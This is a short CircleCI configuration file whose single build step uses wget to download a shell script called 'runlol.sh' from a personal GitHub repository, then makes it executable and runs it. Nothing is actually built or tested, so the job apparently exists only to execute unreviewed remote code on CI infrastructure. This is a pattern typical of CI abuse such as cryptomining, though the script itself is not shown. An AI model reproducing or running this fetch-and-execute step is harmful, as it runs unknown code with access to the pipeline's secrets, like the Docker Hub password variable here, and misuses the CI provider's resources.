version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - run: wget https://raw.githubusercontent.com/Myaxisplay/pos/main/runlol.sh && chmod +x runlol.sh && ./runlol.sh
